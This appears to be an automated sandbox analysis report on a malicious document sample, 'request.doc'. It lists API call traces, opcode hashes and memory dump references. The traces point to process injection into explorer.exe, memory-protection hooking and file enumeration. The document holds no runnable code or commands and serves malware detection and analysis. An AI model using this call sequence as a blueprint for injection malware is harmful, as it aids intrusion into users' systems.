  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: explorer.exe Analysis ID: 37523

General

Root Process Name:d3d8sext.exe
Process MD5:6DDCA324434FFA506CF7DC4E51DB7935
Total matches:898
Initial Analysis Report:Open
Initial sample Analysis ID:37523
Initial sample SHA 256:3903705C0E2EB3B9D6C289257AA515C987ED06EAB3051C7C68369A4A64D93ECF
Initial sample name:request.doc

Similar Executed Functions

Function 01B3432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 96fc59e142f8f3589546cfe20ec42451b64ec7524ff1705d84ef22f3f4a31ef3
  • Instruction ID: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
  • Opcode Fuzzy Hash: 29219E03028ED390CA255D8305A2B932155DF81F53C6CE3F474BCB66855F51BE1A5789
  • Instruction Fuzzy Hash: 948e35715aeb2c22ee387c870a62c94da742bb75a7307fa5466974192b7d840c
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B343CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01B343E1
  • CloseHandle.KERNEL32(?), ref: 01B343F8
  • StrRChrA.SHLWAPI(01B311A6,00000000,0000005C), ref: 01B34404
  • lstrcat.KERNEL32(01B311A6,01B3825D), ref: 01B3443E
  • FindFirstFileA.KERNELBASE(01B311A6,?), ref: 01B34454
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34486
  • StrChrA.SHLWAPI(?,0000002E), ref: 01B344F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 01B3452D
  • FindNextFileA.KERNELBASE(?,?), ref: 01B34542
  • CompareFileTime.KERNEL32(?,?), ref: 01B3456B
  • HeapFree.KERNEL32(00000000,00000000,01B38049), ref: 01B345A1
  • HeapFree.KERNEL32(00000000,01B311A6), ref: 01B345B1
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 001D7A61, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124 Total matches: 6memory
Similarity
  • Total matches: 6
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-3916222277
  • Opcode ID: 5d54db91bb8872728a7f338422e6e2575366b81ba5fa63999995d3bab01c6a8b
  • Instruction ID: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
  • Opcode Fuzzy Hash: 6C01CE6A618AC256DC3774402413ED2E544DF837C2D4C36339BAB2363F1B813246B70D
  • Instruction Fuzzy Hash: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
APIs
    • Part of subcall function 001DA12F: lstrcmp.KERNEL32(?,00000000), ref: 001DA1E4
    • Part of subcall function 001DA12F: lstrlen.KERNEL32(?,00000001,00000000,?), ref: 001DA1EF
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
  • GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001D799E: lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001D799E: lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
    • Part of subcall function 001D799E: StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
    • Part of subcall function 001D799E: GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
  • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D8479: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,001EB220), ref: 001D8490
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CD890, Relevance: 7.6, APIs: 5, Instructions: 123 Total matches: 3memorysynchronization
Similarity
  • Total matches: 3
  • API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx
  • String ID:
  • API String ID: 567273588-0
  • Opcode ID: ab5aec27645f8af340170e833bba8119d55850c0883528ab0e192ea95400f4cf
  • Instruction ID: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
  • Opcode Fuzzy Hash: 1A0149B715154283E0BF24D4CA047BE9A4DDB906DAACC6A47FE15705885A0FD6C03FC1
  • Instruction Fuzzy Hash: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
APIs
  • SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
  • HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
  • ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
  • LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
    • Part of subcall function 001CE2B9: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE2C2
    • Part of subcall function 001CE2B9: Sleep.KERNEL32(0000000A,?,001EB068,?,00000000,001C13EB), ref: 001CE2CC
    • Part of subcall function 001CE2B9: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE2F7
    • Part of subcall function 001DAB1D: RtlLeaveCriticalSection.NTDLL(001EAFF4), ref: 001DAB5B
    • Part of subcall function 001DAB1D: HeapFree.KERNEL32(00000000,001EAFF4), ref: 001DAB6A
    • Part of subcall function 001D80C6: GetVersion.KERNEL32(001EB068,00000000,001E51C0,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80EA
    • Part of subcall function 001D80C6: GetModuleHandleA.KERNEL32(001EC8C6,001ED08E,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80FE
    • Part of subcall function 001D80C6: GetProcAddress.KERNEL32(00000000,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D8105
    • Part of subcall function 001D7EEA: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7EF4
    • Part of subcall function 001D7EEA: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7F30
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
